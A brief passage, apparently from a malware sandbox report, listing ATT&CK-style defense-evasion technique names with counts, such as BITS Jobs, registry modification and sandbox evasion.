- BITS Jobs (1)
Defense Evasion
- Modify Registry (2)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
- BITS Jobs (1)
Downloads